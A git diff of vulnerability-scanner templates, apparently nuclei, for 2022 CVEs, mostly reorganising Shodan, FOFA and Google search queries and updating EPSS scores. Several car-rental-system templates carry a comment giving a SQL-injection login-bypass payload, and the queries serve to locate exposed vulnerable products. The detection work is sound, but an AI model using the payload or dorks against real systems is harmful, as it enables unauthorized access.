a/http/cves/2022/CVE-2022-28219.yaml +++ b/http/cves/2022/CVE-2022-28219.yaml @@ -31,7 +31,9 @@ info: max-request: 1 vendor: zohocorp product: manageengine_adaudit_plus - shodan-query: http.title:"ADAudit Plus" || http.title:"ManageEngine - ADManager Plus" + shodan-query: + - http.title:"ADAudit Plus" || http.title:"ManageEngine - ADManager Plus" + - http.title:"adaudit plus" || http.title:"manageengine - admanager plus" fofa-query: title="adaudit plus" || http.title:"manageengine - admanager plus" google-query: intitle:"adaudit plus" || http.title:"manageengine - admanager plus" tags: cve,cve2022,xxe,rce,zoho,manageengine,unauth,zohocorp diff --git a/http/cves/2022/CVE-2022-28290.yaml b/http/cves/2022/CVE-2022-28290.yaml index 174f43ac00..440a8a3110 100644 --- a/http/cves/2022/CVE-2022-28290.yaml +++ b/http/cves/2022/CVE-2022-28290.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2022-28290 cwe-id: CWE-79 epss-score: 0.00088 - epss-percentile: 0.36353 + epss-percentile: 0.37623 cpe: cpe:2.3:a:welaunch:wordpress_country_selector:1.6.5:*:*:*:*:wordpress:*:* metadata: max-request: 2 diff --git a/http/cves/2022/CVE-2022-28363.yaml b/http/cves/2022/CVE-2022-28363.yaml index c4c63a5174..2bbb9c08e3 100644 --- a/http/cves/2022/CVE-2022-28363.yaml +++ b/http/cves/2022/CVE-2022-28363.yaml @@ -28,8 +28,12 @@ info: max-request: 1 vendor: reprisesoftware product: reprise_license_manager - shodan-query: http.html:"reprise license" - fofa-query: body="reprise license manager" + shodan-query: + - http.html:"reprise license" + - http.html:"reprise license manager" + fofa-query: + - body="reprise license manager" + - body="reprise license" google-query: inurl:"/goforms/menu" tags: cve,cve2022,xss,rlm,packetstorm,reprisesoftware diff --git a/http/cves/2022/CVE-2022-28365.yaml b/http/cves/2022/CVE-2022-28365.yaml index 6eb13e21e4..5880ee6692 100644 --- a/http/cves/2022/CVE-2022-28365.yaml +++ b/http/cves/2022/CVE-2022-28365.yaml @@ -28,8 +28,12 @@ info: max-request: 1 vendor: reprisesoftware product: reprise_license_manager - shodan-query: http.html:"reprise license" - fofa-query: body="reprise license manager" + shodan-query: + - http.html:"reprise license" + - http.html:"reprise license manager" + fofa-query: + - body="reprise license manager" + - body="reprise license" google-query: inurl:"/goforms/menu" tags: cve,cve2022,rlm,packetstorm,exposure,reprisesoftware diff --git a/http/cves/2022/CVE-2022-28923.yaml b/http/cves/2022/CVE-2022-28923.yaml index d3b76c01df..fca70f095d 100644 --- a/http/cves/2022/CVE-2022-28923.yaml +++ b/http/cves/2022/CVE-2022-28923.yaml @@ -29,7 +29,9 @@ info: max-request: 1 vendor: caddyserver product: caddy - shodan-query: 'Server: caddy' + shodan-query: + - 'Server: caddy' + - "server: caddy" tags: cve,cve2022,redirect,caddy,webserver,caddyserver http: diff --git a/http/cves/2022/CVE-2022-28955.yaml b/http/cves/2022/CVE-2022-28955.yaml index 126a2daab7..e9b9f80dbe 100644 --- a/http/cves/2022/CVE-2022-28955.yaml +++ b/http/cves/2022/CVE-2022-28955.yaml @@ -29,7 +29,9 @@ info: max-request: 2 vendor: dlink product: dir-816l_firmware - shodan-query: http.html:"DIR-816L" + shodan-query: + - http.html:"DIR-816L" + - http.html:"dir-816l" fofa-query: body="dir-816l" tags: cve2022,cve,dlink,exposure diff --git a/http/cves/2022/CVE-2022-29153.yaml b/http/cves/2022/CVE-2022-29153.yaml index 5145a0635b..181ef85449 100644 --- a/http/cves/2022/CVE-2022-29153.yaml +++ b/http/cves/2022/CVE-2022-29153.yaml @@ -21,14 +21,17 @@ info: cve-id: CVE-2022-29153 cwe-id: CWE-918 epss-score: 0.02376 - epss-percentile: 0.89603 + epss-percentile: 0.89839 cpe: cpe:2.3:a:hashicorp:consul:*:*:*:*:-:*:*:* metadata: verified: true max-request: 2 vendor: hashicorp product: consul - shodan-query: title:"Consul by HashiCorp" + shodan-query: + - title:"Consul by HashiCorp" + - http.title:"consul by hashicorp" + - cpe:"cpe:2.3:a:hashicorp:consul" fofa-query: title="consul by hashicorp" google-query: intitle:"consul by hashicorp" tags: cve,cve2022,consul,hashicorp,ssrf,intrusive diff --git a/http/cves/2022/CVE-2022-29272.yaml b/http/cves/2022/CVE-2022-29272.yaml index 9a4b9d84ab..87cdb83179 100644 --- a/http/cves/2022/CVE-2022-29272.yaml +++ b/http/cves/2022/CVE-2022-29272.yaml @@ -29,7 +29,9 @@ info: vendor: nagios product: nagios_xi shodan-query: http.title:"nagios xi" - fofa-query: title="nagios xi" + fofa-query: + - title="nagios xi" + - app="nagios-xi" google-query: intitle:"nagios xi" tags: cve,cve2022,redirect,nagios,nagiosxi diff --git a/http/cves/2022/CVE-2022-29298.yaml b/http/cves/2022/CVE-2022-29298.yaml index fa1e4c5e5b..a57783ad44 100644 --- a/http/cves/2022/CVE-2022-29298.yaml +++ b/http/cves/2022/CVE-2022-29298.yaml @@ -28,7 +28,9 @@ info: max-request: 1 vendor: contec product: sv-cpt-mc310_firmware - shodan-query: http.html:"SolarView Compact" + shodan-query: + - http.html:"SolarView Compact" + - http.html:"solarview compact" fofa-query: body="solarview compact" tags: cve,cve2022,lfi,solarview,edb,contec diff --git a/http/cves/2022/CVE-2022-29299.yaml b/http/cves/2022/CVE-2022-29299.yaml index d334a36759..eb5f8e0a33 100644 --- a/http/cves/2022/CVE-2022-29299.yaml +++ b/http/cves/2022/CVE-2022-29299.yaml @@ -18,7 +18,7 @@ info: classification: cve-id: CVE-2022-29299 epss-score: 0.00175 - epss-percentile: 0.53704 + epss-percentile: 0.5456 metadata: verified: true max-request: 1 diff --git a/http/cves/2022/CVE-2022-29303.yaml b/http/cves/2022/CVE-2022-29303.yaml index f521195e84..4da2d1c743 100644 --- a/http/cves/2022/CVE-2022-29303.yaml +++ b/http/cves/2022/CVE-2022-29303.yaml @@ -21,15 +21,17 @@ info: cvss-score: 9.8 cve-id: CVE-2022-29303 cwe-id: CWE-78 - epss-score: 0.9598 - epss-percentile: 0.99429 + epss-score: 0.96471 + epss-percentile: 0.99582 cpe: cpe:2.3:o:contec:sv-cpt-mc310_firmware:6.00:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: contec product: sv-cpt-mc310_firmware - shodan-query: http.html:"SolarView Compact" + shodan-query: + - http.html:"SolarView Compact" + - http.html:"solarview compact" fofa-query: body="solarview compact" tags: cve,cve2022,injection,solarview,edb,packetstorm,rce,kev,contec variables: diff --git a/http/cves/2022/CVE-2022-29349.yaml b/http/cves/2022/CVE-2022-29349.yaml index 28da09bfa3..f8d934c551 100644 --- a/http/cves/2022/CVE-2022-29349.yaml +++ b/http/cves/2022/CVE-2022-29349.yaml @@ -28,8 +28,12 @@ info: max-request: 1 vendor: keking product: kkfileview - shodan-query: http.html:"kkFileView" - fofa-query: body="kkfileview" + shodan-query: + - http.html:"kkFileView" + - http.html:"kkfileview" + fofa-query: + - body="kkfileview" + - app="kkfileview" tags: cve,cve2022,kkFileView,xss,keking http: diff --git a/http/cves/2022/CVE-2022-29548.yaml b/http/cves/2022/CVE-2022-29548.yaml index d1d83d95df..8eebdf0a5e 100644 --- a/http/cves/2022/CVE-2022-29548.yaml +++ b/http/cves/2022/CVE-2022-29548.yaml @@ -29,9 +29,9 @@ info: max-request: 1 vendor: wso2 product: api_manager - google-query: inurl:"carbon/admin/login" shodan-query: http.favicon.hash:1398055326 fofa-query: icon_hash=1398055326 + google-query: inurl:"carbon/admin/login" tags: cve,cve2022,wso2,xss,packetstorm http: diff --git a/http/cves/2022/CVE-2022-29775.yaml b/http/cves/2022/CVE-2022-29775.yaml index ce8893b72c..60830060b2 100644 --- a/http/cves/2022/CVE-2022-29775.yaml +++ b/http/cves/2022/CVE-2022-29775.yaml @@ -29,7 +29,9 @@ info: max-request: 1 vendor: ispyconnect product: ispy - shodan-query: http.html:"iSpy is running" + shodan-query: + - http.html:"iSpy is running" + - http.html:"ispy is running" fofa-query: body="ispy is running" tags: cve,cve2022,ispy,auth-bypass,ispyconnect diff --git a/http/cves/2022/CVE-2022-30489.yaml b/http/cves/2022/CVE-2022-30489.yaml index 07dc5b0c16..6670d91887 100644 --- a/http/cves/2022/CVE-2022-30489.yaml +++ b/http/cves/2022/CVE-2022-30489.yaml @@ -29,8 +29,13 @@ info: max-request: 1 vendor: wavlink product: wn535g3_firmware - shodan-query: http.title:"Wi-Fi APP Login" - fofa-query: title="wi-fi app login" + shodan-query: + - http.title:"Wi-Fi APP Login" + - http.html:"wavlink" + - http.title:"wi-fi app login" + fofa-query: + - title="wi-fi app login" + - body="wavlink" google-query: intitle:"wi-fi app login" tags: cve,cve2022,xss,wavlink,router,iot diff --git a/http/cves/2022/CVE-2022-30514.yaml b/http/cves/2022/CVE-2022-30514.yaml index 70cbd9eb9d..66c94ea2a4 100644 --- a/http/cves/2022/CVE-2022-30514.yaml +++ b/http/cves/2022/CVE-2022-30514.yaml @@ -21,8 +21,8 @@ info: cvss-score: 6.1 cve-id: CVE-2022-30514 cwe-id: CWE-79 - epss-score: 0.00097 - epss-percentile: 0.39401 + epss-score: 0.00112 + epss-percentile: 0.44481 cpe: cpe:2.3:a:school_dormitory_management_system_project:school_dormitory_management_system:1.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-30525.yaml b/http/cves/2022/CVE-2022-30525.yaml index 2588d2fd9f..e75734e5fc 100644 --- a/http/cves/2022/CVE-2022-30525.yaml +++ b/http/cves/2022/CVE-2022-30525.yaml @@ -28,7 +28,9 @@ info: max-request: 1 vendor: zyxel product: usg_flex_100w_firmware - shodan-query: title:"USG FLEX 100","USG FLEX 100w","USG FLEX 200","USG FLEX 500","USG FLEX 700","USG FLEX 50","USG FLEX 50w","ATP100","ATP200","ATP500","ATP700" + shodan-query: + - title:"USG FLEX 100","USG FLEX 100w","USG FLEX 200","USG FLEX 500","USG FLEX 700","USG FLEX 50","USG FLEX 50w","ATP100","ATP200","ATP500","ATP700" + - http.title:"usg flex 100","usg flex 100w","usg flex 200","usg flex 500","usg flex 700","usg flex 50","usg flex 50w","atp100","atp200","atp500","atp700" tags: cve2022,cve,packetstorm,zyxel,firewall,unauth,kev,msf,rce http: diff --git a/http/cves/2022/CVE-2022-30776.yaml b/http/cves/2022/CVE-2022-30776.yaml index d0de8e9479..7f3d1c317e 100644 --- a/http/cves/2022/CVE-2022-30776.yaml +++ b/http/cves/2022/CVE-2022-30776.yaml @@ -29,8 +29,12 @@ info: max-request: 1 vendor: atmail product: atmail - shodan-query: http.html:"atmail" - fofa-query: body="powered by atmail" + shodan-query: + - http.html:"atmail" + - http.html:"powered by atmail" + fofa-query: + - body="powered by atmail" + - body="atmail" tags: cve2022,cve,atmail,xss http: diff --git a/http/cves/2022/CVE-2022-30777.yaml b/http/cves/2022/CVE-2022-30777.yaml index 75745cda14..907be56f20 100644 --- a/http/cves/2022/CVE-2022-30777.yaml +++ b/http/cves/2022/CVE-2022-30777.yaml @@ -29,9 +29,16 @@ info: max-request: 2 vendor: parallels product: h-sphere - shodan-query: title:"h-sphere" - fofa-query: title="h-sphere" - google-query: intitle:"h-sphere" + shodan-query: + - title:"h-sphere" + - http.title:"h-sphere" + - http.title:"parallels h-sphere" + fofa-query: + - title="h-sphere" + - title="parallels h-sphere" + google-query: + - intitle:"h-sphere" + - intitle:"parallels h-sphere" tags: cve,cve2022,parallels,hsphere,xss http: diff --git a/http/cves/2022/CVE-2022-31126.yaml b/http/cves/2022/CVE-2022-31126.yaml index a0d248be53..f32fde29ab 100644 --- a/http/cves/2022/CVE-2022-31126.yaml +++ b/http/cves/2022/CVE-2022-31126.yaml @@ -28,7 +28,9 @@ info: max-request: 1 vendor: roxy-wi product: roxy-wi - shodan-query: http.html:"Roxy-WI" + shodan-query: + - http.html:"Roxy-WI" + - http.html:"roxy-wi" fofa-query: body="roxy-wi" tags: cve2022,cve,rce,unauth,roxy,packetstorm,roxy-wi diff --git a/http/cves/2022/CVE-2022-31268.yaml b/http/cves/2022/CVE-2022-31268.yaml index 3df8c7c7fe..c325cd95bd 100644 --- a/http/cves/2022/CVE-2022-31268.yaml +++ b/http/cves/2022/CVE-2022-31268.yaml @@ -29,8 +29,13 @@ info: max-request: 1 vendor: gitblit product: gitblit - shodan-query: http.html:"Gitblit" - fofa-query: title="gitblit" + shodan-query: + - http.html:"Gitblit" + - http.title:"gitblit" + - http.html:"gitblit" + fofa-query: + - title="gitblit" + - body="gitblit" google-query: intitle:"gitblit" tags: cve,cve2022,lfi,gitblit diff --git a/http/cves/2022/CVE-2022-31269.yaml b/http/cves/2022/CVE-2022-31269.yaml index 84f1d81054..aa7356f532 100644 --- a/http/cves/2022/CVE-2022-31269.yaml +++ b/http/cves/2022/CVE-2022-31269.yaml @@ -29,9 +29,16 @@ info: max-request: 1 vendor: nortekcontrol product: emerge_e3_firmware - shodan-query: http.title:"Linear eMerge" - fofa-query: title="emerge" - google-query: intitle:"linear emerge" + shodan-query: + - http.title:"Linear eMerge" + - http.title:"emerge" + - http.title:"linear emerge" + fofa-query: + - title="emerge" + - title="linear emerge" + google-query: + - intitle:"linear emerge" + - intitle:"emerge" tags: cve,cve2022,emerge,exposure,packetstorm,nortekcontrol http: diff --git a/http/cves/2022/CVE-2022-31373.yaml b/http/cves/2022/CVE-2022-31373.yaml index 8590a9e9ab..bd1a671221 100644 --- a/http/cves/2022/CVE-2022-31373.yaml +++ b/http/cves/2022/CVE-2022-31373.yaml @@ -29,7 +29,9 @@ info: max-request: 1 vendor: contec product: sv-cpt-mc310_firmware - shodan-query: http.html:"SolarView Compact" + shodan-query: + - http.html:"SolarView Compact" + - http.html:"solarview compact" fofa-query: body="solarview compact" tags: cve2022,cve,xss,solarview,contec diff --git a/http/cves/2022/CVE-2022-3142.yaml b/http/cves/2022/CVE-2022-3142.yaml index 418d12f78e..b8848da068 100644 --- a/http/cves/2022/CVE-2022-3142.yaml +++ b/http/cves/2022/CVE-2022-3142.yaml @@ -27,9 +27,9 @@ info: vendor: basixonline product: nex-forms framework: wordpress - publicwww-query: /wp-content/plugins/nex-forms-express-wp-form-builder/ shodan-query: http.html:/wp-content/plugins/nex-forms-express-wp-form-builder/ fofa-query: body=/wp-content/plugins/nex-forms-express-wp-form-builder/ + publicwww-query: /wp-content/plugins/nex-forms-express-wp-form-builder/ tags: cve,cve2022,wpscan,packetstorm,wordpress,sqli,wp-plugin,wp,authenticated,basixonline http: diff --git a/http/cves/2022/CVE-2022-31499.yaml b/http/cves/2022/CVE-2022-31499.yaml index 7ba5b1420f..cfe7c95aea 100644 --- a/http/cves/2022/CVE-2022-31499.yaml +++ b/http/cves/2022/CVE-2022-31499.yaml @@ -29,9 +29,16 @@ info: max-request: 1 vendor: nortekcontrol product: emerge_e3_firmware - shodan-query: title:"eMerge" - fofa-query: title="emerge" - google-query: intitle:"linear emerge" + shodan-query: + - title:"eMerge" + - http.title:"emerge" + - http.title:"linear emerge" + fofa-query: + - title="emerge" + - title="linear emerge" + google-query: + - intitle:"linear emerge" + - intitle:"emerge" tags: cve,cve2022,packetstorm,emerge,rce,nortekcontrol http: diff --git a/http/cves/2022/CVE-2022-31656.yaml b/http/cves/2022/CVE-2022-31656.yaml index 868f59a5de..8b4060b4cc 100644 --- a/http/cves/2022/CVE-2022-31656.yaml +++ b/http/cves/2022/CVE-2022-31656.yaml @@ -30,7 +30,9 @@ info: vendor: vmware product: identity_manager shodan-query: http.favicon.hash:-1250474341 - fofa-query: icon_hash=-1250474341 + fofa-query: + - icon_hash=-1250474341 + - app="vmware-workspace-one-access" || app="vmware-identity-manager" || app="vmware-vrealize" tags: cve2022,cve,vmware,lfi http: diff --git a/http/cves/2022/CVE-2022-31798.yaml b/http/cves/2022/CVE-2022-31798.yaml index 7d4a8910b2..253a56f51d 100644 --- a/http/cves/2022/CVE-2022-31798.yaml +++ b/http/cves/2022/CVE-2022-31798.yaml @@ -29,9 +29,16 @@ info: max-request: 1 vendor: nortekcontrol product: emerge_e3_firmware - shodan-query: http.title:"eMerge" - fofa-query: title="emerge" - google-query: intitle:"linear emerge" + shodan-query: + - http.title:"eMerge" + - http.title:"emerge" + - http.title:"linear emerge" + fofa-query: + - title="emerge" + - title="linear emerge" + google-query: + - intitle:"linear emerge" + - intitle:"emerge" tags: cve2022,cve,emerge,nortek,xss,packetstorm,nortekcontrol http: diff --git a/http/cves/2022/CVE-2022-31845.yaml b/http/cves/2022/CVE-2022-31845.yaml index a052ca9bf8..b5c4e81f6b 100644 --- a/http/cves/2022/CVE-2022-31845.yaml +++ b/http/cves/2022/CVE-2022-31845.yaml @@ -27,8 +27,13 @@ info: max-request: 1 vendor: wavlink product: wn535g3_firmware - shodan-query: http.html:"Wavlink" - fofa-query: title="wi-fi app login" + shodan-query: + - http.html:"Wavlink" + - http.html:"wavlink" + - http.title:"wi-fi app login" + fofa-query: + - title="wi-fi app login" + - body="wavlink" google-query: intitle:"wi-fi app login" tags: cve,cve2022,wavlink,exposure diff --git a/http/cves/2022/CVE-2022-31846.yaml b/http/cves/2022/CVE-2022-31846.yaml index 0558a8bf2d..28f531ace1 100644 --- a/http/cves/2022/CVE-2022-31846.yaml +++ b/http/cves/2022/CVE-2022-31846.yaml @@ -22,15 +22,20 @@ info: cve-id: CVE-2022-31846 cwe-id: CWE-668 epss-score: 0.00874 - epss-percentile: 0.80651 + epss-percentile: 0.82407 cpe: cpe:2.3:o:wavlink:wn535g3_firmware:m35g3r.v5030.180927:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: wavlink product: wn535g3_firmware - shodan-query: http.html:"Wavlink" - fofa-query: title="wi-fi app login" + shodan-query: + - http.html:"Wavlink" + - http.html:"wavlink" + - http.title:"wi-fi app login" + fofa-query: + - title="wi-fi app login" + - body="wavlink" google-query: intitle:"wi-fi app login" tags: cve,cve2022,wavlink,exposure diff --git a/http/cves/2022/CVE-2022-31847.yaml b/http/cves/2022/CVE-2022-31847.yaml index de254b0f4b..e95aa4986b 100644 --- a/http/cves/2022/CVE-2022-31847.yaml +++ b/http/cves/2022/CVE-2022-31847.yaml @@ -28,7 +28,9 @@ info: max-request: 1 vendor: wavlink product: wn579x3_firmware - shodan-query: http.html:"Wavlink" + shodan-query: + - http.html:"Wavlink" + - http.html:"wavlink" fofa-query: body="wavlink" tags: cve,cve2022,wavlink,exposure diff --git a/http/cves/2022/CVE-2022-32022.yaml b/http/cves/2022/CVE-2022-32022.yaml index 6bd1441b08..7dfd667168 100644 --- a/http/cves/2022/CVE-2022-32022.yaml +++ b/http/cves/2022/CVE-2022-32022.yaml @@ -27,7 +27,9 @@ info: max-request: 2 vendor: car_rental_management_system_project product: car_rental_management_system - shodan-query: http.html:"Car Rental Management System" + shodan-query: + - http.html:"Car Rental Management System" + - http.html:"car rental management system" fofa-query: body="car rental management system" tags: cve,cve2022,carrental,cms,sqli,login-bypass,car_rental_management_system_project diff --git a/http/cves/2022/CVE-2022-32024.yaml b/http/cves/2022/CVE-2022-32024.yaml index 725eae45a2..c3ecce8914 100644 --- a/http/cves/2022/CVE-2022-32024.yaml +++ b/http/cves/2022/CVE-2022-32024.yaml @@ -26,9 +26,11 @@ info: max-request: 2 vendor: car_rental_management_system_project product: car_rental_management_system - shodan-query: http.html:"Car Rental Management System" - comment: Login bypass is also possible using the payload- admin'+or+'1'%3D'1' in username. + shodan-query: + - http.html:"Car Rental Management System" + - http.html:"car rental management system" fofa-query: body="car rental management system" + comment: Login bypass is also possible using the payload- admin'+or+'1'%3D'1' in username. tags: cve,cve2022,carrental,cms,sqli,authenticated,car_rental_management_system_project variables: num: "999999999" diff --git a/http/cves/2022/CVE-2022-32025.yaml b/http/cves/2022/CVE-2022-32025.yaml index 4783617bb6..6bed7f833a 100644 --- a/http/cves/2022/CVE-2022-32025.yaml +++ b/http/cves/2022/CVE-2022-32025.yaml @@ -19,17 +19,19 @@ info: cvss-score: 7.2 cve-id: CVE-2022-32025 cwe-id: CWE-89 - epss-score: 0.01426 - epss-percentile: 0.8625 + epss-score: 0.01593 + epss-percentile: 0.87356 cpe: cpe:2.3:a:car_rental_management_system_project:car_rental_management_system:1.0:*:*:*:*:*:*:* metadata: verified: true max-request: 2 vendor: car_rental_management_system_project product: car_rental_management_system - shodan-query: http.html:"Car Rental Management System" - comment: Login bypass is also possible using the payload - admin'+or+'1'%3D'1' in username. + shodan-query: + - http.html:"Car Rental Management System" + - http.html:"car rental management system" fofa-query: body="car rental management system" + comment: Login bypass is also possible using the payload - admin'+or+'1'%3D'1' in username. tags: cve,cve2022,carrental,cms,sqli,authenticated,car_rental_management_system_project variables: num: "999999999" diff --git a/http/cves/2022/CVE-2022-32026.yaml b/http/cves/2022/CVE-2022-32026.yaml index 1bebc48cda..ec1d320723 100644 --- a/http/cves/2022/CVE-2022-32026.yaml +++ b/http/cves/2022/CVE-2022-32026.yaml @@ -28,9 +28,11 @@ info: max-request: 2 vendor: car_rental_management_system_project product: car_rental_management_system - shodan-query: http.html:"Car Rental Management System" - comment: Login bypass is also possible using the payload- admin'+or+'1'%3D'1' in username. + shodan-query: + - http.html:"Car Rental Management System" + - http.html:"car rental management system" fofa-query: body="car rental management system" + comment: Login bypass is also possible using the payload- admin'+or+'1'%3D'1' in username. tags: cve,cve2022,carrental,cms,sqli,authenticated,car_rental_management_system_project variables: num: "999999999" diff --git a/http/cves/2022/CVE-2022-32028.yaml b/http/cves/2022/CVE-2022-32028.yaml index ce53554b2b..5f5b25ea43 100644 --- a/http/cves/2022/CVE-2022-32028.yaml +++ b/http/cves/2022/CVE-2022-32028.yaml @@ -19,17 +19,19 @@ info: cvss-score: 7.2 cve-id: CVE-2022-32028 cwe-id: CWE-89 - epss-score: 0.01426 - epss-percentile: 0.8625 + epss-score: 0.01593 + epss-percentile: 0.87356 cpe: cpe:2.3:a:car_rental_management_system_project:car_rental_management_system:1.0:*:*:*:*:*:*:* metadata: verified: true max-request: 2 vendor: car_rental_management_system_project product: car_rental_management_system - shodan-query: http.html:"Car Rental Management System" - comment: Login bypass is also possible using the payload - admin'+or+'1'%3D'1' in username. + shodan-query: + - http.html:"Car Rental Management System" + - http.html:"car rental management system" fofa-query: body="car rental management system" + comment: Login bypass is also possible using the payload - admin'+or+'1'%3D'1' in username. tags: cve,cve2022,carrental,cms,sqli,authenticated,car_rental_management_system_project variables: num: "999999999" diff --git a/http/cves/2022/CVE-2022-32094.yaml b/http/cves/2022/CVE-2022-32094.yaml index 49fc8166af..e834ab4ce1 100644 --- a/http/cves/2022/CVE-2022-32094.yaml +++ b/http/cves/2022/CVE-2022-32094.yaml @@ -28,7 +28,9 @@ info: max-request: 1 vendor: hospital_management_system_project product: hospital_management_system - shodan-query: http.html:"Hospital Management System" + shodan-query: + - http.html:"Hospital Management System" + - http.html:"hospital management system" fofa-query: body="hospital management system" tags: cve,cve2022,hms,cms,sqli,auth-bypass,hospital_management_system_project diff --git a/http/cves/2022/CVE-2022-32195.yaml b/http/cves/2022/CVE-2022-32195.yaml index c56b304eae..1bd2ead43b 100644 --- a/http/cves/2022/CVE-2022-32195.yaml +++ b/http/cves/2022/CVE-2022-32195.yaml @@ -29,9 +29,11 @@ info: max-request: 1 vendor: edx product: open_edx - shodan-query: http.html:"Open edX" - comment: Hover the cursor on the redirect link + shodan-query: + - http.html:"Open edX" + - http.html:"open edx" fofa-query: body="open edx" + comment: Hover the cursor on the redirect link tags: cve,cve2022,openedx,xss,edx http: diff --git a/http/cves/2022/CVE-2022-3242.yaml b/http/cves/2022/CVE-2022-3242.yaml index 89c31aba06..bd9478e720 100644 --- a/http/cves/2022/CVE-2022-3242.yaml +++ b/http/cves/2022/CVE-2022-3242.yaml @@ -24,8 +24,12 @@ info: max-request: 1 vendor: microweber product: microweber - shodan-query: http.favicon.hash:780351152 - fofa-query: body="microweber" + shodan-query: + - http.favicon.hash:780351152 + - http.html:"microweber" + fofa-query: + - body="microweber" + - icon_hash=780351152 tags: cve,cve2022,huntr,xss,microweber http: diff --git a/http/cves/2022/CVE-2022-32430.yaml b/http/cves/2022/CVE-2022-32430.yaml index e4572dee99..20d0ac1a2d 100644 --- a/http/cves/2022/CVE-2022-32430.yaml +++ b/http/cves/2022/CVE-2022-32430.yaml @@ -22,9 +22,9 @@ info: max-request: 1 vendor: talelin product: lin-cms-spring-boot - fofa-query: body="心上无垢,林间有风" shodan-query: http.html:"心上无垢,林间有风" - tags: cve,cve2022,lin-cms,auth-bypass + fofa-query: body="心上无垢,林间有风" + tags: cve,cve2022,lin-cms,auth-bypass,talelin http: - method: GET diff --git a/http/cves/2022/CVE-2022-32770.yaml b/http/cves/2022/CVE-2022-32770.yaml index ebdfe2a0f5..d9e30e234b 100644 --- a/http/cves/2022/CVE-2022-32770.yaml +++ b/http/cves/2022/CVE-2022-32770.yaml @@ -29,7 +29,9 @@ info: max-request: 1 vendor: wwbn product: avideo - shodan-query: http.html:"AVideo" + shodan-query: + - http.html:"AVideo" + - http.html:"avideo" fofa-query: body="avideo" tags: cve2022,cve,avideo,xss,wwbn diff --git a/http/cves/2022/CVE-2022-32771.yaml b/http/cves/2022/CVE-2022-32771.yaml index 68c57598c7..e34eb71e32 100644 --- a/http/cves/2022/CVE-2022-32771.yaml +++ b/http/cves/2022/CVE-2022-32771.yaml @@ -29,7 +29,9 @@ info: max-request: 1 vendor: wwbn product: avideo - shodan-query: http.html:"AVideo" + shodan-query: + - http.html:"AVideo" + - http.html:"avideo" fofa-query: body="avideo" tags: cve,cve2022,avideo,xss,wwbn diff --git a/http/cves/2022/CVE-2022-32772.yaml b/http/cves/2022/CVE-2022-32772.yaml index bb8f14fa40..f2a5f4451f 100644 --- a/http/cves/2022/CVE-2022-32772.yaml +++ b/http/cves/2022/CVE-2022-32772.yaml @@ -29,7 +29,9 @@ info: max-request: 1 vendor: wwbn product: avideo - shodan-query: http.html:"AVideo" + shodan-query: + - http.html:"AVideo" + - http.html:"avideo" fofa-query: body="avideo" tags: cve2022,cve,avideo,xss,wwbn diff --git a/http/cves/2022/CVE-2022-33119.yaml b/http/cves/2022/CVE-2022-33119.yaml index 1938b73c11..9686cb9d55 100644 --- a/http/cves/2022/CVE-2022-33119.yaml +++ b/http/cves/2022/CVE-2022-33119.yaml @@ -29,7 +29,9 @@ info: max-request: 1 vendor: nuuo product: nvrsolo_firmware - shodan-query: http.html:"NVRsolo" + shodan-query: + - http.html:"NVRsolo" + - http.html:"nvrsolo" fofa-query: body="nvrsolo" tags: cve,cve2022,nvrsolo,xss,nuuo diff --git a/http/cves/2022/CVE-2022-33174.yaml b/http/cves/2022/CVE-2022-33174.yaml index 5b8abf2e39..46ee6d8bb3 100644 --- a/http/cves/2022/CVE-2022-33174.yaml +++ b/http/cves/2022/CVE-2022-33174.yaml @@ -21,15 +21,17 @@ info: cvss-score: 7.5 cve-id: CVE-2022-33174 cwe-id: CWE-863 - epss-score: 0.01241 - epss-percentile: 0.85189 + epss-score: 0.01207 + epss-percentile: 0.85196 cpe: cpe:2.3:o:powertekpdus:basic_pdu_firmware:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: powertekpdus product: basic_pdu_firmware - shodan-query: http.html:"Powertek" + shodan-query: + - http.html:"Powertek" + - http.html:"powertek" fofa-query: body="powertek" tags: cve2022,cve,powertek,auth-bypass,powertekpdus diff --git a/http/cves/2022/CVE-2022-33891.yaml b/http/cves/2022/CVE-2022-33891.yaml index 6e5153487e..e8b344a378 100644 --- a/http/cves/2022/CVE-2022-33891.yaml +++ b/http/cves/2022/CVE-2022-33891.yaml @@ -29,8 +29,13 @@ info: max-request: 1 vendor: apache product: spark - shodan-query: title:"Spark Master at" - fofa-query: body="/apps/imt/html/" + shodan-query: + - title:"Spark Master at" + - http.html:"/apps/imt/html/" + - http.title:"spark master at" + fofa-query: + - body="/apps/imt/html/" + - title="spark master at" google-query: intitle:"spark master at" tags: cve2022,cve,apache,spark,kev,packetstorm variables: diff --git a/http/cves/2022/CVE-2022-33965.yaml b/http/cves/2022/CVE-2022-33965.yaml index 5d27da4da4..91801a78bb 100644 --- a/http/cves/2022/CVE-2022-33965.yaml +++ b/http/cves/2022/CVE-2022-33965.yaml @@ -30,9 +30,9 @@ info: vendor: plugins-market product: wp_visitor_statistics framework: wordpress - google-query: inurl:"/wp-content/plugins/wp-stats-manager" - fofa-query: body="wp-stats-manager" shodan-query: http.html:"wp-stats-manager" + fofa-query: body="wp-stats-manager" + google-query: inurl:"/wp-content/plugins/wp-stats-manager" tags: cve2022,cve,wordpress,wp-plugin,wp,unauth,sqli,wp-stats-manager,plugins-market http: diff --git a/http/cves/2022/CVE-2022-34045.yaml b/http/cves/2022/CVE-2022-34045.yaml index 435486fe0c..ec1aa1be8f 100644 --- a/http/cves/2022/CVE-2022-34045.yaml +++ b/http/cves/2022/CVE-2022-34045.yaml @@ -28,8 +28,13 @@ info: max-request: 1 vendor: wavlink product: wl-wn530hg4_firmware - shodan-query: http.html:"WN530HG4" - fofa-query: body="wn530hg4" + shodan-query: + - http.html:"WN530HG4" + - http.html:"wn530hg4" + - http.title:"wi-fi app login" + fofa-query: + - body="wn530hg4" + - title="wi-fi app login" google-query: intitle:"wi-fi app login" tags: cve,cve2022,wavlink,exposure diff --git a/http/cves/2022/CVE-2022-34046.yaml b/http/cves/2022/CVE-2022-34046.yaml index 7ac287b4bc..1fa1d06f36 100644 --- a/http/cves/2022/CVE-2022-34046.yaml +++ b/http/cves/2022/CVE-2022-34046.yaml @@ -29,8 +29,13 @@ info: max-request: 1 vendor: wavlink product: wn533a8_firmware - shodan-query: http.title:"Wi-Fi APP Login" - fofa-query: title="wi-fi app login" + shodan-query: + - http.title:"Wi-Fi APP Login" + - http.html:"wavlink" + - http.title:"wi-fi app login" + fofa-query: 